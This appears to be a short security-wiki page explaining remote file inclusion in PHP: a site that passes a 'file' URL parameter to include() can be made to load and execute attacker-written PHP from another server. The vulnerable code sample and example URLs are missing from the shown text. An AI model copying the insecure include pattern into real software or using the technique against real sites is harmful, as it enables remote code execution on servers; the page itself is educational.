Questions about this topic? Sign up to ask in the talk tab.

File Inclusion/Remote File Inclusion

From NetSec
Jump to: navigation, search

Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.

The example URI of a vulnerable site will be /include.php?file=howto.php

PHP for this may look like:

 <TITLE>Page Title</TITLE>
RPU0j.png The above PHP code is vulnerable. Do not use this on your site!

An attacker that sees


may change the URL to


In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.